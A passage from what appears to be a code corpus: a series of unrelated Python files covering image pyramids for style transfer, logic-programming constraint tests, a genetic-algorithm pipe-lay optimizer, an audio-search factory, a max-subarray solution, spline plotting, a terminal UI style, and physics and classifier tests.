                resized_guide = level.resize_guide(loss_.input_guide)
                loss_.set_input_guide(resized_guide)

    def _resize_losses(self) -> Set[loss.Loss]:
        resize_losses = set()
        for target in self._resize_targets:
            if isinstance(target, loss.Loss):
                resize_losses.add(target)

            for loss_ in target._losses():
                if not isinstance(loss_, loss.LossContainer):
                    resize_losses.add(loss_)
        return resize_losses

    def _properties(self) -> Dict[str, Any]:
        dct = super()._properties()
        if self.interpolation_mode != "bilinear":
            dct["interpolation_mode"] = self.interpolation_mode
        return dct

    def _named_children(self) -> Iterator[Tuple[str, Any]]:
        yield from super()._named_children()
        for idx, level in enumerate(self._levels):
            yield str(idx), level


class OctaveImagePyramid(ImagePyramid):
    r"""Image pyramid that comprises levels spaced by a factor of two.

    Args:
        max_edge_size: Maximum edge size.
        num_steps: Number of steps for each level.

            .. note::
                If ``num_steps`` is specified as sequence of ``int``s, you should also
                specify ``num_levels`` to match the lengths

        num_levels: Optional number of levels. If ``None``, the number is determined by
            the number of steps of factor two between ``max_edge_size`` and
            ``min_edge_size``.
        min_edge_size: Minimum edge size for the automatic calculation of
            ``num_levels``.
        image_pyramid_kwargs: Additional options. See
            :class:`~pystiche.pyramid.ImagePyramid` for details.
    """

    def __init__(
        self,
        max_edge_size: int,
        num_steps: Union[int, Sequence[int]],
        num_levels: Optional[int] = None,
        min_edge_size: int = 64,
        **image_pyramid_kwargs: Any,
    ) -> None:
        if num_levels is None:
            num_levels = int(floor(log2(max_edge_size / min_edge_size))) + 1

        edge_sizes = [
            round(max_edge_size / (2.0 ** ((num_levels - 1) - level)))
            for level in range(num_levels)
        ]
        super().__init__(edge_sizes, num_steps, **image_pyramid_kwargs)
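# Minimal usage sketch (illustrative only): `content_loss` and the per-step
# optimization are assumed to exist elsewhere; only the pyramid API defined
# above is exercised here.
#
#   pyramid = OctaveImagePyramid(
#       max_edge_size=512, num_steps=200, resize_targets=(content_loss,)
#   )
#   for level in pyramid:
#       for step in level:
#           ...  # resize inputs via level.resize_image and run one step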
439514
from itertools import permutations

from cons import cons
from pytest import raises
from unification import reify, unify, var
from unification.core import _reify, stream_eval

from kanren import conde, eq, run
from kanren.constraints import (
    ConstrainedState,
    ConstrainedVar,
    DisequalityStore,
    isinstanceo,
    neq,
    typeo,
)
from kanren.core import lconj
from kanren.goals import membero


def test_ConstrainedState():
    a_lv, b_lv = var(), var()

    ks = ConstrainedState()
    assert repr(ks) == "ConstrainedState({}, {})"

    assert ks == {}
    assert {} == ks
    assert not ks == {a_lv: 1}
    assert not ks == ConstrainedState({a_lv: 1})

    assert unify(1, 1, ks) is not None
    assert unify(1, 2, ks) is False
    assert unify(b_lv, a_lv, ks)
    assert unify(a_lv, b_lv, ks)
    assert unify(a_lv, b_lv, ks)

    # Now, try that with a constraint (that's never used).
    ks.constraints[DisequalityStore] = DisequalityStore({a_lv: {1}})

    assert not ks == {a_lv: 1}
    assert not ks == ConstrainedState({a_lv: 1})

    assert unify(1, 1, ks) is not None
    assert unify(1, 2, ks) is False
    assert unify(b_lv, a_lv, ks)
    assert unify(a_lv, b_lv, ks)
    assert unify(a_lv, b_lv, ks)

    ks = ConstrainedState(
        {a_lv: 1}, constraints={DisequalityStore: DisequalityStore({b_lv: {1}})}
    )
    ks_2 = ks.copy()

    assert ks == ks_2
    assert ks is not ks_2
    assert ks.constraints is not ks_2.constraints
    assert ks.constraints[DisequalityStore] is not ks_2.constraints[DisequalityStore]
    assert (
        ks.constraints[DisequalityStore].lvar_constraints[b_lv]
        == ks_2.constraints[DisequalityStore].lvar_constraints[b_lv]
    )
    assert (
        ks.constraints[DisequalityStore].lvar_constraints[b_lv]
        is not ks_2.constraints[DisequalityStore].lvar_constraints[b_lv]
    )


def test_reify():
    var_a = var("a")

    ks = ConstrainedState()
    assert repr(ConstrainedVar(var_a, ks)) == "~a: {}"

    de = DisequalityStore({var_a: {1, 2}})
    ks.constraints[DisequalityStore] = de

    assert repr(de) == "ConstraintStore(neq: {~a: {1, 2}})"
    assert de.constraints_str(var()) == ""

    assert repr(ConstrainedVar(var_a, ks)) == "~a: {neq {1, 2}}"

    # TODO: Make this work with `reify` when `var('a')` isn't in `ks`.
    assert isinstance(reify(var_a, ks), ConstrainedVar)
    assert repr(stream_eval(_reify(var_a, ks))) == "~a: {neq {1, 2}}"


def test_ConstraintStore():
    a_lv, b_lv = var(), var()
    assert DisequalityStore({a_lv: {1}}) == DisequalityStore({a_lv: {1}})
    assert DisequalityStore({a_lv: {1}}) != DisequalityStore({a_lv: {1}, b_lv: {}})

    assert a_lv in DisequalityStore({a_lv: {1}})


def test_ConstrainedVar():
    a_lv = var()
    a_clv = ConstrainedVar(a_lv, ConstrainedState())

    assert a_lv == a_clv
    assert a_clv == a_lv
    assert hash(a_lv) == hash(a_clv)
    assert a_lv in {a_clv}
    assert a_clv in {a_lv}


def test_disequality_basic():
    a_lv, b_lv = var(), var()

    ks = ConstrainedState()
    de = DisequalityStore({a_lv: {1}})
    ks.constraints[DisequalityStore] = de

    assert unify(a_lv, 1, ks) is False

    ks = unify(a_lv, b_lv, ks)
    assert unify(b_lv, 1, ks) is False

    res = list(lconj(neq({}, 1))({}))
    assert len(res) == 1

    res = list(lconj(neq(1, {}))({}))
    assert len(res) == 1

    res = list(lconj(neq({}, {}))({}))
    assert len(res) == 0

    res = list(lconj(neq(a_lv, 1))({}))
    assert len(res) == 1
    assert isinstance(res[0], ConstrainedState)
    assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1}

    res = list(lconj(neq(1, a_lv))({}))
    assert len(res) == 1
    assert isinstance(res[0], ConstrainedState)
    assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1}

    res = list(lconj(neq(a_lv, 1), neq(a_lv, 2), neq(a_lv, 1))({}))
    assert len(res) == 1
    assert isinstance(res[0], ConstrainedState)
    assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1, 2}

    res = list(lconj(neq(a_lv, 1), eq(a_lv, 2))({}))
    assert len(res) == 1
    assert isinstance(res[0], ConstrainedState)
    # The constrained variable is already ground and satisfies the constraint,
    # so it should've been removed from the store
    assert a_lv not in res[0].constraints[DisequalityStore].lvar_constraints
    assert res[0][a_lv] == 2

    res = list(lconj(eq(a_lv, 1), neq(a_lv, 1))({}))
    assert res == []


def test_disequality():
    a_lv, b_lv = var(), var()
    q_lv, c_lv = var(), var()

    goal_sets = [
        ([neq(a_lv, 1)], 1),
        ([neq(cons(1, a_lv), [1]), eq(a_lv, [])], 0),
        ([neq(cons(1, a_lv), [1]), eq(a_lv, b_lv), eq(b_lv, [])], 0),
        ([neq([1], cons(1, a_lv)), eq(a_lv, b_lv), eq(b_lv, [])], 0),
        # TODO FIXME: This one won't work due to an ambiguity in `cons`.
        # (
        #     [
        #         neq([1], cons(1, a_lv)),
        #         eq(a_lv, b_lv),
        #         # Both make `cons` produce a list
        #         conde([eq(b_lv, None)], [eq(b_lv, [])]),
        #     ],
        #     0,
        # ),
        ([neq(cons(1, a_lv), [1]), eq(a_lv, b_lv), eq(b_lv, tuple())], 1),
        ([neq([1], cons(1, a_lv)), eq(a_lv, b_lv), eq(b_lv, tuple())], 1),
        (
            [
                neq([1], cons(1, a_lv)),
                eq(a_lv, b_lv),
                # The first should fail, the second should succeed
                conde([eq(b_lv, [])], [eq(b_lv, tuple())]),
            ],
            1,
        ),
        ([neq(a_lv, 1), eq(a_lv, 1)], 0),
        ([neq(a_lv, 1), eq(b_lv, 1), eq(a_lv, b_lv)], 0),
        ([neq(a_lv, 1), eq(b_lv, 1), eq(a_lv, b_lv)], 0),
        ([neq(a_lv, b_lv), eq(b_lv, c_lv), eq(c_lv, a_lv)], 0),
    ]

    for i, (goal, num_results) in enumerate(goal_sets):
        # The order of goals should not matter, so try them all
        for goal_ord in permutations(goal):
            res = list(lconj(*goal_ord)({}))
            assert len(res) == num_results, (i, goal_ord)

            res = list(lconj(*goal_ord)(ConstrainedState()))
            assert len(res) == num_results, (i, goal_ord)

            assert len(run(0, q_lv, *goal_ord)) == num_results, (i, goal_ord)


def test_typeo_basic():
    a_lv, q_lv = var(), var()

    assert run(0, q_lv, typeo(q_lv, int)) == (q_lv,)
    assert run(0, q_lv, typeo(1, int)) == (q_lv,)
    assert run(0, q_lv, typeo(1, str)) == ()
    assert run(0, q_lv, typeo("hi", str)) == (q_lv,)
    assert run(0, q_lv, typeo([], q_lv)) == (q_lv,)
    # Invalid second arg type (i.e. not a type)
    assert run(0, q_lv, typeo(1, 1)) == ()

    assert run(0, q_lv, membero(q_lv, (1, "cat", 2.2, "hat")), typeo(q_lv, str)) == (
        "cat",
        "hat",
    )

    with raises(ValueError):
        run(0, q_lv, typeo(a_lv, str), typeo(a_lv, int))


def test_typeo():
    a_lv, b_lv, q_lv = var(), var(), var()

    goal_sets = [
        # Logic variable instance type that's immediately ground in another
        # goal
        ([typeo(q_lv, int), eq(q_lv, 1)], (1,)),
        # Use an unhashable constrained term
        ([typeo(q_lv, list), eq(q_lv, [])], ([],)),
        # TODO: A constraint parameter that is never ground
        # ([typeo(a_lv, q_lv), eq(a_lv, 1)], (int,)),
        # A non-ground, non-logic variable instance argument that changes type
        # when ground
        ([typeo(cons(1, a_lv), list), eq(a_lv, [])], (q_lv,)),
        # Logic variable instance and type arguments
        ([typeo(q_lv, int), eq(b_lv, 1), eq(b_lv, q_lv)], (1,)),
        # The same, but with `conde`
        (
            [
                typeo(q_lv, int),
                # One succeeds, one fails
                conde([eq(b_lv, 1)], [eq(b_lv, "hi")]),
                eq(b_lv, q_lv),
            ],
            (1,),
        ),
        # Logic variable instance argument that's eventually grounded to a
        # mismatched instance type through another logic variable
        ([typeo(q_lv, int), eq(b_lv, 1.0), eq(b_lv, q_lv)], ()),
        # Logic variable type argument that's eventually grounded to a
        # mismatched instance type through another logic variable (i.e. both
        # arguments are ground to `int` types)
        ([typeo(q_lv, b_lv), eq(b_lv, int), eq(b_lv, q_lv)], ()),
        # Logic variable type argument that's eventually grounded to a
        # mismatched instance type through another logic variable (i.e. both
        # arguments are ground to the value `1`, which violates the second
        # argument type expectations)
        ([typeo(q_lv, b_lv), eq(b_lv, 1), eq(b_lv, q_lv)], ()),
        # Check a term that's unground but ground enough for this constraint
        ([typeo(a_lv, tuple), eq([(b_lv,)], a_lv)], ()),
    ]

    for i, (goal, expected) in enumerate(goal_sets):
        for goal_ord in permutations(goal):
            res = run(0, q_lv, *goal_ord)
            assert res == expected, (i, goal_ord)


def test_instanceo_basic():
    q_lv = var()

    assert run(0, q_lv, isinstanceo(q_lv, int)) == (q_lv,)
    assert run(0, q_lv, isinstanceo(1, int)) == (q_lv,)
    assert run(0, q_lv, isinstanceo(1, object)) == (q_lv,)
    # NOTE: Not currently supported.
    # assert run(0, q_lv, isinstanceo(1, (int, object))) == (q_lv,)
    assert run(0, q_lv, isinstanceo(1, str)) == ()
    # NOTE: Not currently supported.
    # assert run(0, q_lv, isinstanceo(1, (str, list))) == ()
    assert run(0, q_lv, isinstanceo("hi", str)) == (q_lv,)

    # Invalid second arg type (i.e. not a type)
    assert run(0, q_lv, isinstanceo(1, 1)) == ()


def test_instanceo():
    b_lv, q_lv = var(), var()

    goal_sets = [
        # Logic variable instance type that's immediately ground in another
        # goal
        ([isinstanceo(q_lv, list), eq(q_lv, [])], ([],)),
        # Logic variable in the type argument that's eventually unified with
        # a valid type for the given instance argument
        ([isinstanceo([], q_lv), eq(q_lv, list)], (list,)),
        # Logic variable type argument that's eventually reified to a tuple
        # containing a valid type for the instance argument
        # NOTE: Not currently supported.
        # (
        #     [isinstanceo([], q_lv), eq(q_lv, (int, b_lv)), eq(b_lv, list)],
        #     ((int, list),),
        # ),
        # A non-ground, non-logic variable instance argument that changes type
        # when ground
        ([isinstanceo(cons(1, q_lv), list), eq(q_lv, [])], ([],)),
        # Logic variable instance argument that's eventually grounded through
        # another logic variable
        ([isinstanceo(q_lv, int), eq(b_lv, 1), eq(b_lv, q_lv)], (1,)),
        # The same, but with `conde`
        (
            [
                isinstanceo(q_lv, int),
                # One succeeds, one fails
                conde([eq(b_lv, 1)], [eq(b_lv, "hi")]),
                eq(b_lv, q_lv),
            ],
            (1,),
        ),
        # Logic variable instance argument that's eventually grounded to a
        # mismatched instance type through another logic variable
        ([isinstanceo(q_lv, int), eq(b_lv, 1.0), eq(b_lv, q_lv)], ()),
        # Logic variable type argument that's eventually grounded to a
        # mismatched instance type through another logic variable (i.e. both
        # arguments are ground to `int` types)
        ([isinstanceo(q_lv, b_lv), eq(b_lv, int), eq(b_lv, q_lv)], ()),
        # Logic variable type argument that's eventually grounded to a
        # mismatched instance type through another logic variable (i.e. both
        # arguments are ground to the value `1`, which violates the second
        # argument type expectations)
        ([isinstanceo(q_lv, b_lv), eq(b_lv, 1), eq(b_lv, q_lv)], ()),
        # Check a term that's unground but ground enough for this constraint
        ([isinstanceo(q_lv, tuple), eq([(b_lv,)], q_lv)], ()),
    ]

    for i, (goal, expected) in enumerate(goal_sets):
        for goal_ord in permutations(goal):
            res = run(0, q_lv, *goal_ord)
            assert res == expected, (i, goal_ord)
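
def test_neq_with_membero_example():
    # Illustrative addition (not part of the original suite): `neq` prunes
    # the candidate 2 that `membero` produces, leaving only 1 and 3. This
    # mirrors the membero/typeo combination exercised in test_typeo_basic.
    q_lv = var()
    assert run(0, q_lv, membero(q_lv, (1, 2, 3)), neq(q_lv, 2)) == (1, 3)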
439561
from deap import base
from deap import creator
from deap import tools

import random
import numpy

import matplotlib.pyplot as plt
import seaborn as sns

import elitism
from static_pipelay import static_pipe_lay

# thetaPT = 0...5   # Angle of inclination of firing line from horizontal, [deg]
# LFL = 80...150    # Length of pipe on inclined firing line, [m]
# RB = 100...250    # Radius of over-bend curve between stinger and straight section of firing line, [m]
# ELPT = 5...15     # Height of Point of Tangent above Reference Point (sternpost at keel level),[m]
# LPT = 5...20      # Horizontal distance between Point of Tangent and Reference Point, [m]
# ELWL = 3...20     # Elevation of Water Level above Reference Point, [m]
# LMP = 2...10      # Horizontal distance between Reference Point and Marriage Point, [m]
# RS = 100...250    # Stinger radius, [m]
# CL = 40...80      # Chord length of the stinger between the Marriage Point and the
#                   # Lift-Off Point at the second from last roller , [m]
BOUNDS_LOW = [0, 80, 100, 5, 5, 3, 2, 100, 40]
BOUNDS_HIGH = [5, 150, 250, 15, 20, 20, 10, 250, 80]

NUM_OF_PARAMS = len(BOUNDS_HIGH)

# Genetic Algorithm constants:
POPULATION_SIZE = 250
P_CROSSOVER = 0.9  # probability for crossover
P_MUTATION = 0.5   # probability for mutating an individual
MAX_GENERATIONS = 50
HALL_OF_FAME_SIZE = 5
CROWDING_FACTOR = 20.0  # crowding factor for crossover and mutation
PENALTY_VALUE = 10.0    # penalty multiplier applied to fitness when a constraint is violated

# set the random seed:
RANDOM_SEED = 42
random.seed(RANDOM_SEED)

toolbox = base.Toolbox()

# define a single objective, minimizing fitness strategy:
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))

# create the Individual class based on list:
creator.create("Individual", list, fitness=creator.FitnessMin)

# define the hyperparameter attributes individually:
for i in range(NUM_OF_PARAMS):
    # "hyperparameter_0", "hyperparameter_1", ...
    toolbox.register("hyperparameter_" + str(i),
                     random.uniform,
                     BOUNDS_LOW[i],
                     BOUNDS_HIGH[i])

# create a tuple containing an attribute generator for each param searched:
hyperparameters = ()
for i in range(NUM_OF_PARAMS):
    hyperparameters = hyperparameters + (getattr(toolbox, "hyperparameter_" + str(i)),)

# create the individual operator to fill up an Individual instance:
toolbox.register("individualCreator", tools.initCycle, creator.Individual, hyperparameters, n=1)

# create the population operator to generate a list of individuals:
toolbox.register("populationCreator", tools.initRepeat, list, toolbox.individualCreator)


# fitness calculation
def piplayStatic(individual):
    # Pipe data
    ODs = 323.9      # Outer diameter of steel pipe, [mm]
    ts = 14.2        # Wall thickness of steel pipe, [mm]
    Es = 207         # Young's modulus of steel, [GPa]
    SMYS = 358       # SMYS for X52 steel, [MPa]
    rho_s = 7850     # Density of steel,[kg⋅m^−3]
    tFBE = 0.5       # Thickness of FBE insulation layer, [mm]
    rhoFBE = 1300    # Density of FBE, [kg⋅m^−3]
    tconc = 50       # Thickness of concrete coating,[mm]
    rho_conc = 2250  # Density of concrete,[kg⋅m^−3]

    # Environmental data
    d = 50           # Water depth, [m]
    rho_sea = 1025   # Density of seawater,[kg⋅m^−3]

    # Pipe Launch Rollers
    mu_roller = 0.1  # Roller friction for pipe on stinger.
    # Lay-Barge Input Data
    thetaPT = individual[0]  # Angle of inclination of firing line from horizontal, [deg]
    LFL = individual[1]      # Length of pipe on inclined firing line, [m]
    RB = individual[2]       # Radius of over-bend curve between stinger and straight section of firing line, [m]
    ELPT = individual[3]     # Height of Point of Tangent above Reference Point (sternpost at keel level),[m]
    LPT = individual[4]      # Horizontal distance between Point of Tangent and Reference Point, [m]
    ELWL = individual[5]     # Elevation of Water Level above Reference Point, [m]
    LMP = individual[6]      # Horizontal distance between Reference Point and Marriage Point, [m]
    RS = individual[7]       # Stinger radius, [m]
    CL = individual[8]       # Chord length of the stinger between the Marriage Point and the
                             # Lift-Off Point at the second from last roller , [m]

    Ttens_tonnef, TTS_ratio, TopS_ratio = static_pipe_lay(ODs, ts, Es, SMYS, rho_s, tFBE, rhoFBE,
                                                          tconc, rho_conc, d, rho_sea, mu_roller,
                                                          thetaPT, LFL, RB, ELPT, LPT, ELWL, LMP,
                                                          RS, CL)

    if numpy.isnan(Ttens_tonnef):
        Ttens_tonnef = 50

    if TTS_ratio > 0.6 or TTS_ratio < 0.3 or TopS_ratio > 0.9:
        return Ttens_tonnef*PENALTY_VALUE,

    return Ttens_tonnef,


toolbox.register("evaluate", piplayStatic)

# genetic operators:
toolbox.register("select", tools.selTournament, tournsize=2)
toolbox.register("mate",
                 tools.cxSimulatedBinaryBounded,
                 low=BOUNDS_LOW,
                 up=BOUNDS_HIGH,
                 eta=CROWDING_FACTOR)
toolbox.register("mutate",
                 tools.mutPolynomialBounded,
                 low=BOUNDS_LOW,
                 up=BOUNDS_HIGH,
                 eta=CROWDING_FACTOR,
                 indpb=1.0 / NUM_OF_PARAMS)


# Genetic Algorithm flow:
def main():
    # create initial population (generation 0):
    population = toolbox.populationCreator(n=POPULATION_SIZE)

    # prepare the statistics object:
    stats = tools.Statistics(lambda ind: ind.fitness.values)
    stats.register("min", numpy.min)
    stats.register("avg", numpy.mean)

    # define the hall-of-fame object:
    hof = tools.HallOfFame(HALL_OF_FAME_SIZE)

    # perform the Genetic Algorithm flow with hof feature added:
    population, logbook = elitism.eaSimpleWithElitism(population,
                                                      toolbox,
                                                      cxpb=P_CROSSOVER,
                                                      mutpb=P_MUTATION,
                                                      ngen=MAX_GENERATIONS,
                                                      stats=stats,
                                                      halloffame=hof,
                                                      verbose=True)

    # print info for best solution found:
    best = hof.items[0]
    print("-- Best Individual = ", best)
    print("-- Best Fitness = ", best.fitness.values[0])
    print()
    print("Double check: ")

    # Pipe data
    ODs = 323.9      # Outer diameter of steel pipe, [mm]
    ts = 14.2        # Wall thickness of steel pipe, [mm]
    Es = 207         # Young's modulus of steel, [GPa]
    SMYS = 358       # SMYS for X52 steel, [MPa]
    rho_s = 7850     # Density of steel,[kg⋅m^−3]
    tFBE = 0.5       # Thickness of FBE insulation layer, [mm]
    rhoFBE = 1300    # Density of FBE, [kg⋅m^−3]
    tconc = 50       # Thickness of concrete coating,[mm]
    rho_conc = 2250  # Density of concrete,[kg⋅m^−3]

    # Environmental data
    d = 50           # Water depth, [m]
    rho_sea = 1025   # Density of seawater,[kg⋅m^−3]

    # Pipe Launch Rollers
    mu_roller = 0.1  # Roller friction for pipe on stinger.
    # Lay-Barge Input Data
    thetaPT = best[0]  # Angle of inclination of firing line from horizontal, [deg]
    LFL = best[1]      # Length of pipe on inclined firing line, [m]
    RB = best[2]       # Radius of over-bend curve between stinger and straight section of firing line, [m]
    ELPT = best[3]     # Height of Point of Tangent above Reference Point (sternpost at keel level),[m]
    LPT = best[4]      # Horizontal distance between Point of Tangent and Reference Point, [m]
    ELWL = best[5]     # Elevation of Water Level above Reference Point, [m]
    LMP = best[6]      # Horizontal distance between Reference Point and Marriage Point, [m]
    RS = best[7]       # Stinger radius, [m]
    CL = best[8]       # Chord length of the stinger between the Marriage Point and the
                       # Lift-Off Point at the second from last roller , [m]

    Ttens_tonnef, TTS_ratio, TopS_ratio = static_pipe_lay(ODs, ts, Es, SMYS, rho_s, tFBE, rhoFBE,
                                                          tconc, rho_conc, d, rho_sea, mu_roller,
                                                          thetaPT, LFL, RB, ELPT, LPT, ELWL, LMP,
                                                          RS, CL)

    print("Ttens_tonnef: ", Ttens_tonnef, )
    print("TTS_ratio: ", TTS_ratio, " < 0.6")
    print("TopS_ratio: ", TopS_ratio, " < 0.9")

    # extract statistics:
    minFitnessValues, meanFitnessValues = logbook.select("min", "avg")

    # plot statistics:
    sns.set_style("whitegrid")
    plt.plot(minFitnessValues, color='red')
    plt.plot(meanFitnessValues, color='green')
    plt.xlabel('Generation')
    plt.ylabel('Min / Average Fitness')
    plt.title('Min and Average fitness over Generations')
    plt.savefig("gen.png")
    plt.show()


if __name__ == "__main__":
    main()
439605
import os

from model.MCFT import MCFT
from model.SiameseStyle import SiameseStyle
from model.VGGishEmbedding import VGGishEmbedding
from data.TestDataset import TestDataset
from data.OtoMobile import OtoMobile
from log import get_logger

logger = get_logger('factory')


def model_factory(model_name, model_filepath):
    '''
    Given a model name and weight file location, construct the model for
    query-by-voice search.

    Arguments:
        model_name: A string. The name of the model.
        model_filepath: A string. The location of the weight file on disk.

    Returns:
        A QueryByVoiceModel.
    '''
    logger.debug('Attempting to load the {} model from {}'.format(
        model_name, model_filepath))

    if model_name == 'mcft':
        model = MCFT(model_filepath)
    elif model_name == 'siamese-style':
        model = SiameseStyle(model_filepath)
    elif model_name == 'VGGish-embedding':
        model = VGGishEmbedding(model_filepath)
    else:
        raise ValueError('Model {} is not defined'.format(model_name))

    logger.debug('Model loading complete')
    return model


def dataset_factory(
    dataset_name,
    dataset_directory,
    representation_directory,
    construct_representation_batch_size,
    measure_similarity_batch_size,
    model):
    '''
    Constructs a dataset object for query-by-voice search.

    Arguments:
        dataset_name: A string. The name of the dataset.
        dataset_directory: A string. The location of the audio files.
        representation_directory: A string. The location of the corresponding
            audio representations.
        construct_representation_batch_size: An integer or None. The maximum
            number of audio files to load during one batch of representation
            construction.
        measure_similarity_batch_size: An integer or None. The maximum number
            of representations to load during one batch of model inference.
        model: A QueryByVoiceModel. The model being used in the query-by-voice
            system. Defines the audio representation.

    Returns:
        A Dataset object.
    '''
    logger.debug('Attempting to construct the {} dataset in {}. \
        Representations will be stored in {}'.format(
        dataset_name, dataset_directory, representation_directory))

    if dataset_name == 'test_dataset':
        dataset = TestDataset(
            dataset_directory,
            representation_directory,
            model,
            measure_similarity_batch_size,
            construct_representation_batch_size)
    elif dataset_name == 'otomobile':
        dataset = OtoMobile(
            dataset_directory,
            representation_directory,
            model,
            measure_similarity_batch_size,
            construct_representation_batch_size)
    else:
        raise ValueError('Dataset {} is not defined'.format(dataset_name))

    logger.debug('Dataset construction complete.')
    return dataset
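# Illustrative usage sketch (the model and dataset names exist above, but the
# file-system paths and batch sizes are hypothetical placeholders):
#
#   model = model_factory('siamese-style', 'weights/siamese_style.h5')
#   dataset = dataset_factory(
#       'test_dataset', 'data/audio', 'data/representations',
#       construct_representation_batch_size=8,
#       measure_similarity_batch_size=32,
#       model=model)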
439619
class Solution:
    def maxSubArray(self, nums):
        # Prefix-sum variant of Kadane's algorithm:
        #   sm - running prefix sum,
        #   mn - smallest prefix sum seen so far,
        #   mx - best answer, i.e. max over (current prefix - smallest earlier prefix).
        sm, mn, mx = 0, 0, -float("inf")
        for num in nums:
            sm += num
            mx, mn = max(mx, sm - mn), min(mn, sm)
        return mx
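
if __name__ == "__main__":
    # Quick sanity checks (illustrative): the classic example's best subarray
    # is [4, -1, 2, 1] with sum 6, and an all-negative input returns its
    # largest element.
    assert Solution().maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6
    assert Solution().maxSubArray([-1]) == -1
    print("maxSubArray examples passed")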
439634
import numpy as np
from scipy.interpolate import splev
import matplotlib
matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc')
from matplotlib import pyplot as plt

def basis_plot(n, k, res=401):
    """ Plots some b-spline basis functions.
    Uses same knot vector as the circle interpolation problem."""
    # Make the knot vector.
    t = np.array([0]*(k) + list(range(n)) + [n]*(k+1))
    # Preallocate array to store the control points.
    c = np.zeros(t.size - k)
    # Parameter values to use for plot:
    T = np.linspace(0, n, res)
    # Plot each basis function.
    for i in range(t.size - k - 1):
        # Set the corresponding coefficient to 1.
        c[i] = 1
        # plot it.
        plt.plot(T, splev(T, (t, c, k)))
        # Set the corresponding coefficient back to 0.
        c[i] = 0.
    # Save and clear the figure.
    plt.savefig("bspline_basis.pdf")
    plt.clf()

if __name__ == "__main__":
    basis_plot(8, 3)
439730
from .gfpn import GFPN
from .bricks import build_brick, build_bricks
from .builder import build_decoder
439785
from prompt_toolkit.styles import Style
from prompt_toolkit.utils import is_windows


def load_style():
    """
    Return the UI :class:`Style` for the current platform.
    """
    if is_windows():
        return Style.from_dict(win32_code_style)
    else:
        return Style.from_dict(default_ui_style)


default_ui_style = {
    "output-field":   "bg:#171E2B #1CD085",  # noqa: E241
    "input-field":    "bg:#000000 #FFFFFF",  # noqa: E241
    "log-field":      "bg:#171E2B #FFFFFF",  # noqa: E241
    "title":          "bg:#000000 #AAAAAA",  # noqa: E241
    "search":         "bg:#000000 #93C36D",  # noqa: E241
    "search.current": "bg:#000000 #1CD085",  # noqa: E241
    "primary":        "#1CD085",             # noqa: E241
    "warning":        "#93C36D",             # noqa: E241
    "error":          "#F5634A",             # noqa: E241
}

# Style for an older version of Windows consoles. They support only 16 colors,
# so we choose a combination that displays nicely.
win32_code_style = {
    "output-field":   "#ansigreen",         # noqa: E241
    "input-field":    "#ansiwhite",         # noqa: E241
    "log-field":      "#ansiwhite",         # noqa: E241
    "search":         "#ansigreen",         # noqa: E241
    "search.current": "#ansigreen",         # noqa: E241
    "primary":        "#ansigreen",         # noqa: E241
    "warning":        "#ansibrightyellow",  # noqa: E241
    "error":          "#ansired",           # noqa: E241
}
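# Illustrative usage sketch (assumes a prompt_toolkit full-screen app; the
# layout object is a placeholder):
#
#   from prompt_toolkit import Application
#   app = Application(layout=my_layout, style=load_style(), full_screen=True)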
439787
import numpy as np

import lcc.stars_processing.deciders.supervised_deciders as dec
from lcc.stars_processing.deciders.neuron_decider import NeuronDecider


def set_up():
    deciders = [dec.AdaBoostDec(), dec.ExtraTreesDec(), dec.GaussianNBDec(), dec.LDADec(),
                dec.QDADec(), dec.RandomForestDec(), dec.SVCDec(), dec.TreeDec(),
                NeuronDecider(hidden_neurons=10, maxEpochs=500)]
    return np.random.random_sample((100, 7)), np.random.random_sample((100, 7)) + 1, deciders


def test():
    search_sample1, others_sample1, deciders = set_up()
    eee = {}
    for decider in deciders:
        decider.learn(search_sample1, others_sample1)
        p1 = decider.evaluate(search_sample1)
        p2 = decider.evaluate(others_sample1)
        eee[decider.__class__.__name__] = np.mean(p1) - np.mean(p2)
        assert np.mean(p1) - np.mean(p2) > 0.95
439809
"""
Unit and regression test for the kaldo package.
"""
# Import package, test suite, and other packages as needed
from kaldo.forceconstants import ForceConstants
from kaldo.phonons import Phonons
from kaldo.conductivity import Conductivity
import numpy as np
import pytest


@pytest.fixture(scope="function")
def phonons():
    print("Preparing phonons object.")
    forceconstants = ForceConstants.from_folder(folder='kaldo/tests/si-amorphous', format='eskm')
    phonons = Phonons(forceconstants=forceconstants,
                      is_classic=False,
                      temperature=300,
                      third_bandwidth=1 / 4.135,
                      broadening_shape='triangle',
                      storage='memory')
    return phonons


def test_af_conductivity_without_antiresonant(phonons):
    cond = Conductivity(phonons=phonons, method='qhgk', storage='memory')
    cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes))
    cond = (cond.conductivity.sum(axis=0).diagonal().mean())
    np.testing.assert_approx_equal(cond, 0.804, significant=3)


def test_af_conductivity_with_antiresonant(phonons):
    cond = Conductivity(phonons=phonons, method='qhgk', storage='memory')
    cond.is_diffusivity_including_antiresonant = True
    cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes))
    cond = (cond.conductivity.sum(axis=0).diagonal().mean())
    np.testing.assert_approx_equal(cond, 0.825, significant=3)


def test_af_conductivity_without_antiresonant_gauss(phonons):
    cond = Conductivity(phonons=phonons, method='qhgk', storage='memory')
    cond.diffusivity_shape = 'gauss'
    cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes))
    cond = (cond.conductivity.sum(axis=0).diagonal().mean())
    np.testing.assert_approx_equal(cond, 0.8305, significant=3)


def test_af_conductivity_with_antiresonant_gauss(phonons):
    cond = Conductivity(phonons=phonons, method='qhgk', storage='memory')
    cond.diffusivity_shape = 'gauss'
    cond.is_diffusivity_including_antiresonant = True
    cond.diffusivity_bandwidth = phonons.bandwidth.reshape((phonons.n_k_points, phonons.n_modes))
    cond = (cond.conductivity.sum(axis=0).diagonal().mean())
    np.testing.assert_approx_equal(cond, 0.8335, significant=3)
439843
import logging
from logging import NullHandler

from .exceptions import InvalidSWAGDataException

logging.getLogger(__name__).addHandler(NullHandler())
439850
import matplotlib.pyplot as plt
from wbml.plot import tweak

from stheno import B, Measure, GP, EQ

# Define points to predict at.
x = B.linspace(0, 10, 100)

with Measure() as prior:
    f1 = GP(3, EQ())
    f2 = GP(3, EQ())

    # Compute the approximate product.
    f_prod = f1 * f2

# Sample two functions.
s1, s2 = prior.sample(f1(x), f2(x))

